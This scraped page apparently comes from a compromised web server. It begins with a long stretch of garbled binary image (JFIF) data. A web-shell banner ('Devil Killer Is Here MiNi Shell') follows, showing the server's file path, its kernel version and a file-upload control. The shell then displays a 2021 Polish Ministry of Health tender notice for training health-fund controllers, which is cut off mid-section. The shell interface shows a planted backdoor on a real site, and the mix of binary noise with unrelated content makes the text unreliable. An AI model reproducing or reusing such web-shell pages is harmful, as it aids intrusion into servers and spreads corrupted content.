JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210615/0008402902-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00084029 z dnia 2021-06-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie programów szkoleniowych oraz przeprowadzenie szkoleń zgodnie dla kontrolerów NFZ, MZ oraz audytorów wewnętrznych, kadry zarządzającej i pracowników podmiotów leczniczych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ministerstwo Zdrowia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000287987</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Miodowa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-952</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@mz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie programów szkoleniowych oraz przeprowadzenie szkoleń zgodnie dla kontrolerów NFZ, MZ oraz audytorów wewnętrznych, kadry zarządzającej i pracowników podmiotów leczniczych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9b15e38e-cd07-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00084029</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007434/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.25 Opracowanie programów szkoleniowych wraz z przeprowadzeniem szkoleń</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> POWR.05.02.00-00-0003/19-00 pn., Poprawa jakości i efektywności systemu ochrony zdrowia poprzez zwiększenie skuteczności działań kontrolnych i restrukturyzacyjnych – rozwój kompetencji kontrolerów Ministerstwa Zdrowia, Narodowego Funduszu Zdrowia oraz audytorów wewnętrznych, kadry zarządzającej i pracowników podmiotów leczniczych o kluczowym znaczeniu dla funkcjonowania systemu ochrony zdrowia’’ </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia-mz.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcą, w szczególności składanie ofert oraz oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie. <br/>2.	Postępowanie prowadzone jest na Platformie pod adresem https://zamowienia-mz.ezamawiajacy.pl (dalej jako „Platforma”) i pod nazwą postępowania wskazaną w tytule SWZ.<br/>3.	Przeglądanie i pobieranie treści dokumentacji postępowania nie wymaga posiadania konta na Platformie ani logowania do Platformy.<br/>4.	Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta w Platformie, akceptuje warunki korzystania z Platformy.<br/>5.	Zadawanie pytań przez Wykonawców odbywa się poprzez przycisk „Zadaj pytanie”. <br/>6.	Zamawiający informuje na temat kodowania i czasu odbioru danych: <br/>1)	plik z ofertą załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert,<br/>2)	oznaczenie czasu odbioru danych przez Platformę znajduje się po lewej stronie dokumentu w kolumnie „Data przesłania” (hh:mm:ss).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Ochrona danych osobowych - RODO<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 oraz Dz. Urz. UE L 127 z 23.05.2018, str. 2), dalej „RODO”, informuję, że:<br/>1)	Wykonawcy będącego osobą fizyczną,<br/>2)	Wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,<br/>3)	pełnomocnika Wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie),<br/>4)	członka organu zarządzającego Wykonawcy, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK),<br/>5)	osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego lub do kontaktów sprawie realizacji zamówienia; <br/>informuję, że:<br/>a)	administratorem Pani/Pana danych osobowych jest Minister Zdrowia, Ministerstwo Zdrowia, ul. Miodowa 15, 00-952 Warszawa;<br/>b)	z Inspektorem Ochrony Danych w Ministerstwie Zdrowia może Pani/Pan skontaktować się za pośrednictwem poczty elektronicznej przez adres e-mail: iod@mz.gov.pl;<br/>c)	Pani/Pana dane osobowe przetwarzane będą w celu związanym z przeprowadzeniem niniejszego postępowania, na podstawie art. 6 ust. 1 lit. c RODO;<br/>d)	odbiorcą Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Ustawy PZP;<br/>e)	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 Ustawy PZP, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, okres przechowywania obejmuje cały czas trwania umowy;<br/>f)	posiada Pani/Pan prawo dostępu do treści swoich danych oraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo wniesienia sprzeciwu, prawo do cofnięcia zgody w dowolnym momencie bez wpływu na zgodność z prawem przetwarzania (jeżeli przetwarzanie odbywa się na podstawie zgody), którego dokonano na podstawie zgody przed jej cofnięciem;<br/>g)	ma Pani/Pan prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>h)	Pani/Pana dane będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.<br/>i)	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ADR.250.386.2020_</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2453614,47 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie programów szkoleniowych oraz przeprowadzenie szkoleń zgodnie z wypracowanymi programami dla kontrolerów Narodowego Funduszu Zdrowia, Ministerstwa Zdrowia oraz audytorów wewnętrznych, kadry zarządzającej i pracowników podmiotów leczniczych o kluczowym znaczeniu dla funkcjonowania systemu ochrony zdrowia. <br/>Zamówienie podzielone jest na części, z zastrzeżeniem, że Wykonawca ma obowiązek złożyć ofertę na wszystkie części:<br/>Część I – program szkolenia dla pracowników NFZ związanych z korpusem kontrolerskim Funduszu;<br/>Część II – realizacja 14 edycji szkolenia dla pracowników NFZ związanych z korpusem kontrolerskim Funduszu (z zastrzeżeniem, że realizacja poszczególnych edycji może nakładać się na siebie, tj. dopuszczalne jest prowadzenie więcej niż jednej edycji zajęć w ciągu dnia);<br/>Część III – program szkolenia dla pracowników MZ oraz podmiotów leczniczych, instytutów badawczych i innych jednostek, dla których podmiotem tworzącym jest Minister Zdrowia lub uczelnia medyczna;<br/>Część IV – realizacja 10 edycji szkolenia dla pracowników MZ oraz podmiotów leczniczych, instytutów badawczych i innych jednostek, dla których podmiotem tworzącym jest Minister Zdrowia lub uczelnia medyczna (z zastrzeżeniem, ze realizacja poszczególnych edycji może nakładać się na siebie, tj. dopuszczalne jest prowadzenie więcej niż jednej edycji zajęć w ciągu dnia);<br/>Część V - program szkolenia dla audytorów wewnętrznych i kadry zarządzającej podmiotów leczniczych, instytutów badawczych, dla których podmiotem tworzącym jest Minister Zdrowia oraz podmiotów leczniczych (szpitali klinicznych), dla których podmiotem tworzącym jest uczelnia medyczna;<br/>Część VI – realizacja 2 edycji szkolenia dla audytorów wewnętrznych i kadry zarządzającej podmiotów leczniczych, instytutów badawczych, dla których podmiotem tworzącym jest Minister Zdrowia oraz podmiotów leczniczych (szpitali klinicznych), dla których podmiotem tworzącym jest uczelnia medyczna (z zastrzeżeniem, ze realizacja poszczególnych edycji może nakładać się na siebie, tj. dopuszczalne jest prowadzenie więcej niż jednej edycji zajęć w ciągu dnia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80400000-8 - Usługi edukacji osób dorosłych oraz inne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80320000-3 - Usługi edukacji medycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie ekspertów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> I.Wykonawca posiada dośw. polegające na przeprowadzeniu min.3 edycji kursu/studiów/szkoleń o wymiarze min.50hdla każdej edycji(w sumie 150h)i min.20 słuchaczy uczestniczących w każdej edycji(w sumie60 słuchaczy).<br/>II.Wykonawca posiada zespół ekspertów,do realizacji niniejszego zamówienia:<br/>Część I <br/>Wykonawca w ramach zespołu ekspertów zapewni zaangażowanie co najmniej 5:<br/>A.Ekspert ds. prawnych:wyższe prawnicze<br/>*w okresie ostatnich 7lat prowadził min.80hszkoleń/wykładów,w tym co najmniej 40h szkoleń/wykładów dot. zagadnień z zakresu:zasad prowadzenia i dok. kontroli, prowadzenia dok. medycznej (rodzaje, zakres i sposób prowadzenia,kontrola,udostępnianie itd.),wystawiania recept(w tym e-recept).<br/>B.Ekspert ds.medycznych: wyższe, lekarz<br/>*w okresie ostatnich 15lat posiada co najmniej 10-letnie dośw. zawodowe w pracy lekarza, w tym w tworzeniu dok.medycznej,<br/>–w okresie ostatnich 7lat prowadził min. 40h.szkoleń/wykładów obejmujących zagadnienia z zakresu prowadzenia dok.medycznej,kwalifikowania rozpoznań zasadniczych i dodatkowych do odpowiednich kodów chorób i stanów chorobowych wgMiędzynarodowej Statystycznej Klasyfikacji Chorób i Problemów Zdrowotnych(ICD-10),kwalifikowania procedur i zabiegów do odpowiednich kodów procedur medycznych wgMiędzynarodowej Klasyfikacji Procedur Medycznych(ICD-9),oceny jakości oraz bezpieczeństwa udzielonych świadczeń opieki zdrowotnej<br/>C.Ekspert ds.kontroli– wyższe,<br/>*w okresie ostatnich 7lat prowadził lub bezpośrednio nadzorował min.20 kontroli podmiotów leczniczych, osób uprawnionych do ordynacji produktów refundowanych lub aptek(na miejscu),<br/>*w okresie ostatnich 7lat prowadził min.40h szkoleń/wykładów dot. zasad i metodologii prowadzenia kontroli realizacji umowy o udzielanie świadczeń, ordynacji lub aptek;<br/>D.Ekspert ds.Jednorodnych Grup Pacjentów,wykształcenie-wyższe,<br/>*okresie ostatnich 7lat prowadził min.40h szkoleń/wykładów dotyczące zasad stosowania systemu Jednorodnych Grup Pacjentów oraz grupowania(kodowania),rozliczania i finansowania świadczeń opartych o ten system(JGP),<br/>W przypadku spełnienia przez Eksperta ds.prawnych lub przez Eksperta ds.medycznych w okresie ostatnich 7lat wymagania punktowanego w zakresie prowadzenia szkoleń/wykładów dotyczących zasad stosowania systemu Jednorodnych Grup Pacjentów oraz grupowania(kodowania), rozliczania i finansowania świadczeń opartych o ten system(JGP), Ekspert ds.Jednorodnych Grup Pacjentów nie jest wymagany.<br/>E.Ekspert ds.umiejętności interpersonalnych,wyższe, <br/>*w okresie ostatnich 7lat prowadził min.80hszkoleń dot. umiejętności interpersonalnych (komunikacji zewnętrznej i wewnętrznej, radzenia sobie ze stresem, asertywności itd.),w tym min.40h dotyczących umiejętności interpersonalnych kontrolerów.<br/>Część II <br/>Wykonawca w ramach zespołu ekspertów zapewni zaangażowanie co najmniej 7ekspertów:<br/>A.Ekspert ds.prawnych, wyższe prawnicze<br/>*w okresie ostatnich 7lat prowadził min.80h. szkoleń/wykładów,w tym co najmniej 40h szkoleń/wykładów dotyczących zagadnień z zakresu: zasad prowadzenia i dokumentowania kontroli, prowadzenia dok. medycznej(rodzaje,zakres i sposób prowadzenia,kontrola,udostępnianie itd.),wystawiania recept(w tym e-recept).<br/>B.Ekspert ds.medycznych(2 osoby):<br/>Ekspert ds.medycznych I–lekarz,wyższe, lekarz<br/>*w okresie ostatnich 15lat posiada co najmniej 10-letnie dośw. zawodowe w pracy lekarza, w tym w tworzeniu dokumentacji medycznej,<br/>*w okresie ostatnich 7lat prowadził min.40h szkoleń/wykładów obejmujących zagadnienia z zakresu prowadzenia dok. medycznej, kodowania rozpoznań zasadniczych i dodatkowych do odpowiednich kodów chorób i stanów chorobowych wg Międzynarodowej Statystycznej Klasyfikacji Chorób i Problemów Zdrowotnych(ICD-10), kwalifikowania procedur i zabiegów do odpowiednich kodów procedur medycznych wg Międzynarodowej Klasyfikacji Procedur Medycznych (ICD-9), oceny jakości oraz bezpieczeństwa udzielonych świadczeń opieki zdrowotnej.<br/>Ekspert ds. medycznych II –pielęgniarka/pielęgniarz, wykształcenie–wyższe pielęgniarskie<br/>*w okresie ostatnich 20lat posiada co najmniej 15-letnie doświadczenie zawodowe w pracy pielęgniarki/pielęgniarza, w tym w tworzeniu dokumentacji medycznej,<br/>C.Ekspert ds. kontroli(2 osoby):wyższe,<br/>*w okresie ostatnich 7lat prowadził lub bezpośrednio nadzorował min.20 kontroli podmiotów leczniczych, osób uprawnionych do ordynacji produktów refundowanych lub aptek(na miejscu),<br/>*w okresie ostatnich 7lat prowadził min.40hszkoleń/wykładów dotyczących zasad i metodologii prowadzenia kontroli realizacji umowy o udzielanie świadczeń, ordynacji lub aptek. <br/>D.Ekspert ds.Jednorodnych Grup Pacjentów,wyższe,<br/>*w okresie ostatnich 7lat prowadził min. 40h szkoleń/wykładów dot. zasad stosowania systemu Jednorodnych Grup Pacjentów oraz grupowania(kodowania),rozliczania i finansowania świadczeń opartych o ten system(JGP),<br/>W przypadku spełnienia przez Eksperta ds. prawnych lub przez Eksperta ds. medycznych I w okresie ostatnich 7lat wymagania punktowanego w zakresie prowadzenia szkoleń/wykładów dot. zasad stosowania systemu Jednorodnych Grup Pacjentów oraz grupowania(kodowania), rozliczania i finansowania świadczeń opartych o ten system(JGP),Ekspert ds.Jednorodnych Grup Pacjentów nie jest wymagany.<br/>E.Ekspert ds.umiejętności interpersonalnych, wyższe, <br/>*w okresie ostatnich 7lat prowadził min.80h szkoleń dot. umiejętności interpersonalnych (komunikacji zewnętrznej i wewnętrznej, radzenia sobie ze stresem, asertywności itd.), w tym min. 40hdot. umiejętności interpersonalnych kontrolerów–w okresie ostatnich 7lat.<br/>Cześć III<br/>Wykonawca w ramach zespołu ekspertów zapewni zaangażowanie co najmniej 4 ekspertów:<br/>A.Ekspert ds.prawnych ,wyższe prawnicze<br/>*w okresie ostatnich 7lat prowadził min.80h szkoleń/wykładów w tym co najmniej 40h w obszarze ochrony zdrowia lub działalności kontrolnej.<br/>B.Ekspert ds.kontroli,wyższe,<br/>*w okresie ostatnich 7lat prowadził lub bezpośrednio nadzorował min.20 kontroli podmiotów leczniczych (na miejscu),<br/>C.Ekspert ds.finansów,wyższe,<br/>*w okresie ostatnich 15lat posiada co najmniej 10-letnie dośw. zawodowe w finansach, w tym w tworzeniu i realizacji programów naprawczych i programów restrukturyzacyjnych,<br/>D.Ekspert ds.umiejętności interpersonalnych,wyższe, <br/>*w okresie ostatnich 7lat prowadził min.80h szkoleń dotyczących umiejętności interpersonalnych (komunikacji zewnętrznej i wewnętrznej, radzenia sobie ze stresem, asertywności itd.),w tym min.40h dotyczących umiejętności interpersonalnych kontrolerów.<br/>Część IV <br/>Wykonawca w ramach zespołu ekspertów zapewni zaangażowanie co najmniej 4 ekspertów:<br/>A.Ekspert ds.prawnych,wykształcenie – wyższe prawnicze<br/>*w okresie ostatnich 7lat prowadził min80h . szkoleń/wykładów w tym co najmniej 40h. w obszarze ochrony zdrowia lub działalności kontrolnej,<br/>B.Ekspert ds.kontroli,wyższe,<br/>*w okresie ostatnich 7lat prowadził lub bezpośrednio nadzorował min.20 kontroli podmiotów leczniczych (na miejscu),<br/>C.Ekspert ds.finansów,wyższe,<br/>*w okresie ostatnich 15lat posiada co najmniej 10-letnie dośw. zawodowe w finansach, w tym w tworzeniu i realizacji programów naprawczych i programów restrukturyzacyjnych,<br/>D.Ekspert ds.umiejętności interpersonalnych,wyższe, <br/>*w okresie ostatnich 7lat prowadził min.80h szkoleń dot. umiejętności interpersonalnych (komunikacji zewnętrznej i wewnętrznej,radzenia sobie ze stresem,asertywności itd.), w tym min. 40 h. dot.umiejętności interpersonalnych kontrolerów.<br/>Część V 